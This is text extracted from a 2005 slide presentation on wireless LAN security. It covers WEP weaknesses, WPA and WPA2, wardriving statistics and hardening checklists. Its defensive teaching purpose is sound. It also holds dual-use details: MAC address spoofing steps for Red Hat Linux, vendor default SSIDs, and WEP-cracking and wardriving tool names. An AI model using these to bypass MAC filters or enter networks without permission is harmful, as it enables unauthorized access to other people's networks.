CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Wireless LAN In security Update 2005 Robert C. Jones, M.D. LtCol, USAF, Medical Corps LtCol, USAF, Medical Corps Staff Anesthesiologist Andrews Air Force Base, Maryland rob--at--notbob.com Web site:

Disclaimer: Fair Use of Online Resouces l In order to educate health care providers and other professionals, this presentation contains graphics and information obtained on the internet which may be copyrighted l According to Sections 107 and 504c of United States Code title 17, this material is considered to be “fair use” of copyrighted intellectual property; it is to be used for non- commercial purposes only l “Fair Use” is the use of a copyrighted work for purposes such as criticism, comment, news reporting, teaching (including multiple copies for classroom use), scholarship, or research.  In determining whether the use made of a work in any particular case is a fair use, the factors to be considered shall include: –The purpose and character of the use, including whether such use is of a commercial nature or is for nonprofit educational purposes; –The nature of the copyrighted work; –The amount and substantiality of the portion used in relation to the copyrighted work as a whole; and –The effect of the use upon the potential market for or value of the copyrighted work. l The purpose and character of this presentation is for nonprofit educational purposes in support of Homeland Defense and internet security; the nature of the copyrighted work is individual graphics and quotes; the amount and substantiality of the portion used is minimal; and the effect on the potential market for or value of the copyrighted use is negligible. In fact, the hyperlink references crediting the original sources should increase the market value of said copyrighted works by increasing traffic to the websites presenting this material. l This presentation was produced in the United States Air Force medical environment in the interest of academic freedom and the advancement of national defense-related concepts. The views expressed in this presentation and linked-to material are those of the author(s) of said material and do not reflect the official policy or position of the U.S. Air Force, Department of Defense, the United States government, or the AOMPS. Nor do educational links to internet websites or reference sources constitute any kind or degree of verification or validation of information presented therein. Nobody paid me squat to write this stuff, by the way l Point of Contact for questions regarding copyright infringement shall be the current U.S. Department of Defense designated agent to receive notification of claimed DMCA copyright infringement (courtesy of Department of Redundancy Department [DoRD]) l Financial Disclosure: I am a Microsoft shareholder, so I can parody and provide commentary upon the products and services of the Microsoft Corporation with impunity FAIR USE NOTICE: This contains copyrighted material, which is reproduced under the Fair Use Provision of Title 17, U.S.C. Section 107, and is posted for purposes such as criticism, comment, news reporting, teaching, scholarship, or research. This material is posted without profit for the benefit of those who, by accessing this material, are expressing a prior interest in this information for research and educational purposes.

Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. CIA XXIV

Network Abuse Costs $$$: 2003 Data from U.S. FBI Where’s Wireless???

WLAN Abuse 2004: Number 5 with a Bullet Multiple Winblows XP/2000 vulnerabilities

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. The Basic Network Security Pyramid

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Wireless Security 2003 CIA XXIV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Rob’s 2003 WLAN Security Pyramid

CIA XXIV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved.

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004 l Step 1: Physical Security and Wireless Policy

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004 l Step 1: Physical Security and Wireless Policy l Step 2: OS, Firmware Updates; MAC Filtering; SSID

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004 l Step 1: Physical Security and Wireless Policy l Step 2: OS, Firmware Updates; MAC Filtering; SSID l Step 3: Change AP PW; WPA if possible, else WEP

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004 l Step 1: Physical Security and Wireless Policy l Step 2: OS, Firmware Updates; MAC Filtering; SSID l Step 3: Change AP PW; WPA if possible, else WEP l Step 4: Toward i/WPA2 for Home/SOHO use

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004 l Step 1: Physical Security and Wireless Policy l Step 2: OS, Firmware Updates; MAC Filtering; SSID l Step 3: Change AP PW; WPA if possible, else WEP l Step 4: Toward i/WPA2 for Home/SOHO use l Step 5: CSE: OS Updates, Vulnerability News

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004 l Step 1: Physical Security and Wireless Policy l Step 2: OS, Firmware Updates; MAC Filtering; SSID l Step 3: Change AP PW; WPA if possible, else WEP l Step 4: Toward i/WPA2 for Home/SOHO use l Step 5: CSE: OS Updates, Vulnerability News l Future Wireless Security Topics

Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. CIA XXIV Dusko and Vlado Say: Be Responsible with your WLAN-kwon-do! This talk is not a WLAN Cracking HOWTO; this is HOWNOTTO on getting 0wn3d

Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. You can’t afford perfect security “The only secure computer is one that is unplugged, locked in a secure vault that only one person knows the combination to, and that person died last year.” Eckel, G and Steen, W., Intranet Working, New Riders, 1996, p. 419 CIA XXIV

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. CIA XXIV

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Introduction to Wireless vs. Wired Networking l Wired Networking  Inexpensive infrastructure (CAT5 cable + NICs)  Expensive deployment (drilling through walls)  Reconfiguring network topology difficult  Difficult (not impossible!) to intercept communication  Worldwide exposure to intruders if connected to Net  Fast! (10/100 Mbps Ethernet  Gigabit ethernet…)  Negligible interference from environment

Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Basic Wired Network Topology Router Firewall CIA XXIV

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. l Wireless Networking  Expensive infrastructure (clients+APs=cha-ching!)  Inexpensive deployment (protocols supported in OSes)  Reconfiguring network topology trivial (?too trivial?)  Ridiculously easy to intercept communication  Geographically constrained exposure to intruders*  Relatively Slow (“11Mbps” marketingspeak = 5 Mbps)  Massive environmental interference (ISM, path loss) Introduction to Wireless vs. Wired Networking *ad hoc intranetworks

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Quick Review of WLAN Security Terminology l SSID (ESSID): Service Set Identifier = name for WLAN network; sent out as plain text in every packet; broadcast by default by most access points l AP: Access point: WLAN “router” that talks to client cards l WEP: Wired Equivalent Protocol; broken and easily crackable encryption scheme; not “Wired Equivalent Privacy”, et al. l MAC: Unique Media Access Control ID number hard-coded into every networking device; spoofable via software l WPA: Upgrade to WEP security; uses TKIP to rotate encryption keys for each packet and generate different keys for each computer l 802.1x (not to be confused with x): User authentication mechanism using EAP protocol; separate from encryption l i/WPA2: Major upgrade to security; uses new AES crypto algorithm vs. RC4; part of RSN: Robust Security Network TSN = transitional security network with RSN + TKIP instead of CCMP with AES; more on this later

Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Basic Wireless Network Topology Firewall Access Point CIA XXIV Infrastructure Mode (using AP) Advantages: AP security; isolated net connection Disadvantages: AP cost, complexity;  broadcast range

STA 2003 Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Firewall P2P Ad Hoc Networks Basic Wireless Network Topology Advantages: no addt’l hardware; geographically constrained Disadvantages: unmanaged P2Pnet issues; geo. constrained

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Authentication l Default: Open authentication (+/- MAC/SSID filtering) l Shared Key Auth (WEP, WPA PSK) “granted” “give me access” Authentication challenge Authentication response “granted”

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Generic Wireless Security Exploits l Physical Theft l Eavesdropping l Data Modification l Identity Spoofing/Masquerading l Denial of Service (DoS) l Theft of Internet Service l Injection of Bad Things via Wireless l WLAN as new modem (network soft spot)

Generic Wireless Network Exploits Firewall Access Point Physical Theft (Before) Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. CIA XXIV

Generic Wireless Network Exploits Firewall Access Point Physical Theft (After) Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. CIA XXIV

Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Generic Wireless Network Exploits Firewall Access Point Eavesdropping Case 1: Wardriving Gotcha! CIA XXIV

Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Generic Wireless Network Exploits Firewall Access Point Eavesdropping Case 2: Office Building CIA XXIV Your Competitor Tabloid Terrorist

Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Generic Wireless Network Exploits Firewall Access Point Eavesdropping Case 3: Rogue APs Rogue Access Point CIA XXIV

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. The 100 meter myth l Increasingly powerful x clients available l 200 mW PCMCIA cards advertise ft range l Many WiFi ® adapters have external antenna connections; even homemade antennas work well

STA 2003 Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Generic Wireless Network Exploits Firewall Access Point Identity Spoofing Alice Bob MAC Address: 0000deadbeef; SSID: default Cats Spoof MAC Address: 0000deadbeef; SSID: default Looks like your company’s IP to the FBI!

STA 2003 Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Generic Wireless Network Exploits Firewall Access Point Denial of Service (DoS) 2.4 GHz jammer microwaveoven Bluetooth device Cell phone

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Wild Wild WiFi ® : WiFi Hog “Only traffic originating from the Wifi-Hogger's IP address may access the connection, otherwise the PVJ (portable video jammer) is switched on, blocking others from accessing the open node.” Designed to hijack open (public) nodes Designed to hijack open (public) nodes Could easily be used to hijack commercial or home access points with inadequate security Could easily be used to hijack commercial or home access points with inadequate security

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Wardriving Update late 2004 → Mid Sept 04 (same area wardriven in Sep 03); 30 minute drive → Residential neighborhoods/business district → 5 dBi omnidirectional, magnetic, car-mounted antenna → TCP/IP disabled on card  purposely unable to connect/get IP address (thus legal) l 126 APs located; 1 Peer located l 97 APs with no security (77%) l Of 30 with security, only 13 (43%) g (likely WPA compliant out of box) l 62 APs with default SSID bespeaking ignorant owners (49%) l one FAKE-AP (first time: counterfeit AP signals) l Worldwide Wardrive 4 ( of 228,537 APs logged, only 61.6% enabled WEP (or better) security; 31.4% used default SSID (note: Lots of smart non-Merkins included)

Disable prior to wardrive to prevent auto- connection to discovered APs

Note!

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004 l Step 1: Physical Security and Wireless Policy

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Locking It Down: Step 1.1 l Physical Security  Secure your laptop/PDA physically –Windoze XP stores WPA PW and automagically reconnects on startup  BIOS password at least in case WLAN device is stolen!  Secure your access points (locked closets vs. desk) –Remember, reset button on back of AP = Poof! No Security  Wise placement of APs/directional antennas to minimize RF leak  If possible, minimize AP RF power output to least useful  Audit your coverage: Warwalk/drive/sit yourself! Reference:

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Locking It Down: Step 1.2 l Wireless Policy  (Authority) will be in charge of establishing and enforcing WLAN standards; any implementation that deviates from standard must be approved by (authority)  (Authority) will be the only one(s) installing/modifying/ maintaining APs; (Users) will not install APs  Only (authorized user type list) can use the WLAN; all others require explicit permission from (authority)  All WLAN devices must be secured according to standards set by (authority) All communications must be encrypted using (standard)  All (users) must register WLAN devices with (authority) For good example:

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004 l Step 1: Physical Security and Wireless Policy l Step 2: OS, Firmware Updates; MAC Filtering; SSID

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Locking It Down: Step 2.1 l OS/Firmware Updates  Windows XP Service Pack 2 (SP2) –Until Sep 04, very cumbersome process to implement WPA (see notbob.com) –Now, SP2 incorporates new WZC and WPA functionality (finally)  Apple Macintosh: Need firmware upgrade to AirPort Extreme 11g (b sol) –“WPA requires an AirPort Extreme base station and AirPort Extreme or AirPort clients running Mac OS X v10.3 (Panther), or later. Use of Wi-Fi Protected Access (WPA) reduces the maximum number of network users. Computers with wireless cards that only support WEP cannot join an AirPort network that has WPA enabled.” –Client: –AP:  Linux: Support depends on chipset; also see for mondo linkshttp://  Make sure you are running latest version of your AP’s firmware; visit manufacturer’s website every few months at least

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. WPA under WinXP SP1 vs. SP2

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. MAC/SSID Vulnerability l MAC = media access control address  Hardcoded in all NICs  Easily Spoofed under Win 9x, Linux; New! WinXP spoofing via freeware Mac Makeup app: l SSID = Service Set Identifier  Used to define networks  By default, broadcast in the clear by access points  Will be given out by AP if client configured with “any” or blank SSID

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. MAC Address Spoofing Orinoco Gold on Win 98SE edit /etc/sysconfig/network-scripts/ifcfg-eth0 (assuming it's your eth0 network card that you want to change the MAC for), and add a line like this: MACADDR=AA:BB:CC:DD:EE:FF (Obviously you want to substitute the MAC address you want in place of AA:BB:CC:DD:EE:FF) Then "/sbin/ifdown eth0", "/sbin/ifup eth0", and you should be up and running with the new MAC address. You can use "/sbin/ifconfig eth0" to verify that the new MAC address is in effect -- it shows up in the 'HWaddr' entry on the first line that ifconfig prints (YMMV RTFM HTH) Red Hat Linux

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Locking It Down Step 2.2 l MAC Filtering  Better than nothing; will keep out your neighbors  To find your adapters’ MAC addresses, under Windows: start | run | cmd | ipconfig/all ; listed as physical address  Best to explicitly allow only your own MACs; explicit deny is for open APs that are subject to annoying users (without the sense to spoof their MAC addys)

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Default SSIDs l 3Com: comcomcom l Cisco: 2, tsunami, WaveLAN Network l Compaq: Compaq l DLink: WLAN l Intel: 101, 195, xlan, intel l Linksys: linksys, Wireless l Netgear: Wireless l Zcomax: any, mello, Test With AP manufacturer, trivial to determine default Administrator username/password!

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Locking It Down Step 2.2 (cont’d) l SSID Rules  Change from default  Don’t broadcast if possible (WPA flaky sometimes)  Don’t make it your family/business name  Don’t make it interesting to boring is good: ex: thisAP  Make it hard to guess (e.g., not Default1) use this if possible

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004 l Step 1: Physical Security and Wireless Policy l Step 2: OS, Firmware Updates; MAC Filtering; SSID l Step 3: Change AP PW; WPA if possible, else WEP

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Locking It Down Step 3.1 l Change yer freakin’ default AP password!  Every script kiddie and her dog knows the default passwords for major manufacturers! Pick a new, secure PW  Disable remote router administration and Universal Plug and Play (if router doesn’t have nice check box, get Steve Gibson’s UnPlug n’ Pray here: )  While you’re at it, enable router’s firewall function: block anonymous WAN reqests & filter NAT redirection to keep local LAN users from accessing port-forwarded services on router

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Locking It Down Step 3.2 l Use Encryption

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Encryption Basics l Need to hide message (plaintext) = needle l Generate random stuff (encryption key) = piece of hay l Multiply random stuff (keystream) = haystack l Hide message in haystack (XOR)  needle+haystack (ciphertext) Intro to Encryption: XOR Logic Gate

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. WEP…what is WEP? l Wired Equivalent Protocol (NOT Wireless Encryption Privacy) l First defined in 1999 ANSI/IEEE Std , section l Never intended to provide strong security; Goals:  “Reasonably strong” (dependent on key length)  “Self-synchronizing” (for “best effort” delivery)  “Efficient” (low processor overhead)  “Exportable” (pre-1999 ITAR climate [Phil Zimmerman])  “Optional” (so lusers don’t whine to hardware manufacturers when they mess up WEP on their networks– DISABLED out of the box by all OEMs as of 2004 AFAIK * ) *AFAIK= As far as I know

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. How is WEP supposed to work? Secret key combined with IV, run through WEP cipher PRNG (RC4) Secret key combined with IV, run through WEP cipher PRNG (RC4) Plaintext XORed with key sequence (irreversible without key) Plaintext XORed with key sequence (irreversible without key) Ciphertext output sent over airwaves after encapsulation into IP packets Ciphertext output sent over airwaves after encapsulation into IP packets

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What is RC4? l One encryption algorithm (many others: DES, IDEA, Blowfish, AES, etc.) l Efficient streaming cipher (low overhead)-- used in SSL encryption (online banking, etc.) l Proprietary trade secret of RSA Inc. l Presumed RC4 source code uploaded to Usenet newsgroup sci.crypt 13 Sep 1994…all open source RC4 implementations based on this anonymous post (including WEP)! From: (An0nYm0Us UsEr) Newsgroups: sci.crypt Subject: RC4 ? Date: 13 Sep :30:36 GMT Organization: Global Anonymous R Services Ltd. Lines: 83 Message-ID: Message-ID: NNTP-Posting-Host: xs1.xs4all.nl X-Comment: This message did not originate from the above address. X-Comment: It was automatically r ed by an anonymous mailservice. X-Comment: Info: Subject: r er-help X-Comment: Please report inappropriate use to X-Comment: Please report inappropriate use to SUBJECT: RC4 Source Code I've tested this. It is compatible with the RC4 object module that comes in the various RSA toolkits. /* rc4.h */

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Why is WEP Broken? l First paper: Fluhrer, Mantin, Shamir (encryption flaws) l WEP attack using FMS method: Stubblefield, Ionnidis, Rubin l WEP standard implements RC4 improperly l Flaws in key scheduling algorithm  Large number of weak keys  encryption easily cracked l IV is sent in the clear with each chunk– subtract 24 bits of IV from encryption key length

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Enabling WEP Orinoco Gold on Win 98SE Linksys pic modified from:

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Advanced WEP l Freeware key generators create pseudorandom keys for you to enter l Rotate keys frequently (weekly for business, monthly for home at minimum) l Make sure highest key-length WEP is enabled (remember, 64 bit WEP key is really just 40 bits long [thanks, marketing!]) l Upgrade WEP to WPA as soon as possible (look for WPA support for all new hardware)

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Bbbbut…isn’t WEP broken? l Yes, but…just because your front door can be picked, doesn’t mean you shouldn’t lock it! l Never be low hanging fruit for attackers l Lots of old hardware (pre-2004) can’t support WPA, let alone WPA2: WEP is the only option l If you just enable WEP  more secure than 60-75% of WLAN users (according to wardriving data) l If you enable WEP + change SSID from default + change AP logon/pw: more secure than 95% of lusers

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Quick Fix for WEP: WPA l WPA = “WiFi TM Protected Access” l Available as software/firmware upgrade for most chipsets/manufacturers now or soon l Subset of new (Jun 04) i security architecture l Patches major vulnerabilities in WEP:  TKIP fixes IV weakness, adds MIC, key mixing, rekeying  Supports enterprise user authentication via EAP and 802.1X  SOHO mode: Pre-Shared Key (PSK): autorotates key for you

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. TKIP

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Look for the WPA label…

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Enabling WPA PSK in Windoze XP SP2 l Make sure wireless connection works with WEP first l Have wired connection to prevent disconnection with changes l Upgrade Windows XP SP1 to SP2 (Windoze Update) l Pick a good pre-shared key (PSK)! l Upgrade client firmware to support WPA l Implement WPA PSK on router (may need to upgrade firmware) l Implement WPA on Windows XP using WZC (Wireless Zero Configuration) See my separate step-by-step guide on WPA in XP:

Step 1: Upgrade XP to SP2 Step 2: Implement WPA on AP router Step 3: Make sure supplicant supports WPA Step 4: Implement WPA PSK under network connections

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Take Home Message l Everyone in this room should be using WPA instead of WEP at all times right now! l Definitely worth upgrading hardware to support WPA l Hospitals/Medical Offices: Legal risks of NOT using WPA (due diligence) given WEP vulnerabilities

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. What this talk is about l Brief Review of Wireless LAN (WLAN) tech l Wardriving Update Late 2004 l Step 1: Physical Security and Wireless Policy l Step 2: OS, Firmware Updates; MAC Filtering; SSID l Step 3: Change AP PW; WPA if possible, else WEP l Step 4: Toward i/WPA2 for Home/SOHO use

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. WPA Upgrade: IEEE i/WPA2 l 802.1X port-based authentication– requires dedicated authentication server (or server process in AP) l RADIUS authentication: for enterprises only l IEEE i = WPA + RSN; finally ratified Jun 04 l Uses CCMP (counter mode with cipher block chaining [CBC] message authentication code protocol) for enhanced privacy, data integrity, and authentication l RSN: Robust Security Network  802.1X + EAP + AES (non-RC4 encryption protocol) – will likely need hardware upgrade to run RSN without major hit on throughput; likely available in “mature” form in RSN: i (advanced): i (excellent): CBC: er_Block_Chaining/ er_Block_Chaining/ er_Block_Chaining/

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. AES

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Rijndael (Reign-Dahl) is AES l Rijndael is a symmetric block cipher, designed by Belgian/Flemish cryptologists Joan Daemen (Yo-ahn Dah-mun) and Vincent Rijmen (Rý́e-mun)Joan Daemen Vincent Rijmen l Time to 255 keys/sec: 149 trillion years l Basic advantage of AES is its efficiency and low overhead: easier to implement than its competitors for AES standard l For WiFi ®, requires dedicated chip to process cipher in real time “How is that pronounced ? If you're Dutch, Flemish, Indonesian, Surinamer or South-African, it's pronounced like you think it should be. Otherwise, you could pronounce it like "Reign Dahl", "Rain Doll", "Rhine Dahl". We're not picky. As long as you make it sound different from "Region Deal".” Official NIST AES Specs: Intro to AES: Very High Level AES mathematical explanation:

from:

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Do you really need WPA2? l WPA fixes all known problems with WEP l If you avoid choosing weak passphrase subject to dictionary attack, WPA should suffice for most home/SOHO users for now (2005) l As of Oct 04, WPA has not been broken l RC4 will eventually succumb to Moore’s Law  will need to move to AES in the future l AES support in WPA2 probably involves upgrading your hardware: business decision (risk/benefit ratio) See Q&A section here:

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Advanced WLAN Security: Topology Options l Treat all wireless communication as insecure l Put AP on “unsafe” side of firewall l Use VPN (private tunnel) through internet to reach internal network l Impractical for SOHO networks (expensive; throughput hit) Firewall “Safe Side” “Unsafe Side”

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Step 5: CSE  Continuing Security Education l All users should keep up with major security developments, including WLAN security l Excellent resources:  Internet Storm Center  News.com  Wireless News Factor  WiFi Planet  NetworkWorldFusion

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Future Wireless Security Issues 2 l Privacy: Sniffing your car’s radio stations l “Red Means Stop, Ya Moron!”: p l DOS: Wireless Jammers for Jesus l Wireless Viruses: Don’t get stung by Mosquitoes l RFIDS: The Next Security Threat?

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Privacy: Sniffing your car’s radio Device sniffs what radio station you are listening to

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. “Hey, buddy, I’m talking to you” l p is a new IEEE spec to implement WiFi ® for vehicles l “Emergency vehicles might use broadcast via wireless to change traffic signals in order to speed themselves along. Cars might also "communicate" with one another, as an exchange of Wi-Fi signals makes it possible to sound proximity alerts when two vehicles come too close to one another.” l Just imagine the potential for chaos when criminals can change traffic lights remotely, or when pranksters activate all the proximity alerts simultaneously…

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. DOS: Wireless Jammers for Jesus Mexico: Cell phone jammers installed in churches…would likely nuke nearby WiFi as well…

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Don’t Get Stung l Copy protection built into “smart” cellphone game “Mosquitoes” rewritten as Trojan to call expensive premium numbers using embedded Symbian OS l “Sooner or later, I expect I will be advising people not to run unknown applications for their refrigerators and cars,” he says. “It is becoming more of a danger as we embed OS into more of our lives.” --Panda Software CTO Patrick Hinojosa

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. RFID Security: Brave New World? l RFIDs are poised to become ubiquitous l RFIDs have no security and can be hacked l “The thinking is, security is a secondary issue right now that will be fixed once deployments are underway” – Jeff Woods, Gartner Research Director l Ya, that strategy has worked so well for Windows XP, WEP, Iraq…

Prevent theft; BIOS pw; encrypt files; backup data; disaster plan Change default; don’t broadcast Change default admin logon/pw; disable remote admin only if no WPA; rotate keys manually Implement now; choose secure PSK WPA2= 802.1X, i, RSN; VPN + RADIUS for enterprises Patch OS frequently to plug security holes; read media for new WLAN exploits Implement and enforce wireless security AUP/TOS Got WPA? Weekly or automatically Implement MAC filtering

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. WLAN Security Basics Checklist l Pay attention to geographical location of AP (parking lot coverage) l Disable file & print sharing if not needed; never share root l Disable SSID broadcasting (default = enabled for most products) l Change the SSID to something non-default and boring l Upgrade firmware of AP/client to increase security (WPA) l Change default admin login/password for AP; disable remote admin l Configure AP to enable MAC address filtering (not perfect, yes…) l Enable WPA PSK now! For enterprises: RADIUS, WPA2 l Only use WEP as last resort (legacy hardware; rotate keys often) l Wardrive yourself to audit your security (got rogue teenager AP?)

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. The Tao of Network Security : Information Access

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. The Tao of Network Security : Information Access : Information Denial

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Addendum: It’s the Basics, Stupid

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Remember: Common Threats Are Common! l Buffer Overflow attacks based on Windoze vulnerabilities (increasingly zero-day exploits): Sasser, CHM, etc. l Phishing for passwords, bank accounts (↑↑ sophistication) l M$ Outlook/OE exploits: worms, viruses, blended threats l Hostile websites: spyware, malware, browser hijacking l Keystroke loggers: disgruntled employees, spouses, kids l IM attacks: embedded malign URLs, spim, predators… “Wired” attacks are still much more common than WLAN exploits:

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Are Most Users too Stupid for the Internet? Why not require a license for internet access? Wired Article: “Are You Too Stupid to Surf?” Several Downsides: People don’t trust the Gummint (look at TIAO Initiative furor) Money Your Grandma wouldn’t pass the test…ever. If stupid Merkins are kept offline, how about the rest of the world we haven’t “liberated”…yet?

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Are Most Users too Stupid for the Internet? Never update your Anti-virus program’s definitions In fact, let the free version on your new computer expire Click on all attachments with wild abandon Never use a firewall (equivalent: Windoze fw only) Keep thinking that OS security updates are for girlie men Go to naughty sites and install all “required” programs Use insecure, older versions of apps due to nostalgia Ignore computer security alerts in the news (news.com) How to get and 0wn3d in 7 easy Steps:

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. References

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Online Resources WLAN Specifications TM Alliance (formerly WECA): : IEEE i: restricted: of interesting unrestricted IEEE documents: Official Specs: IEEE Communications Overview: ffo.de/systems/Doc/Vorlesung/MC/ %DCbung/Gruppe7-Hiperlan/0130khun.pdf ffo.de/systems/Doc/Vorlesung/MC/ %DCbung/Gruppe7-Hiperlan/0130khun.pdf HiSWAN: Avian IP Transport Protocol (RFC 1149):

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Wardriving Software l NetStumbler l MacStumbler l BSDAirtools l AirSnort l Kismet l Wellenreiter Lots of other tools:

Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. CIA XXIV

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Online Resources Basic Security Security FAQ (ISS): (old) Specifications: WEP Insecurity: (no longer on: ) WPA/WPA2: Wardriving: ; Netstumbler: Wireless Glossary: (heh heh) Build your own Cantenna:

CIA XXV Copyright (C) 2005 Robert C. Jones, M.D. All Rights Reserved. Online Resources Advanced WLAN Security/Continuing Security Education SANS: Internet Storm Center Wireless LAN Security Site: News.com Wireless News Factor WiFi Planet NetworkWorldFusion Google it: search Google for “WLAN security” and/or “WiFi security” Cool list of WLAN Security Links: Still More whitepapers:

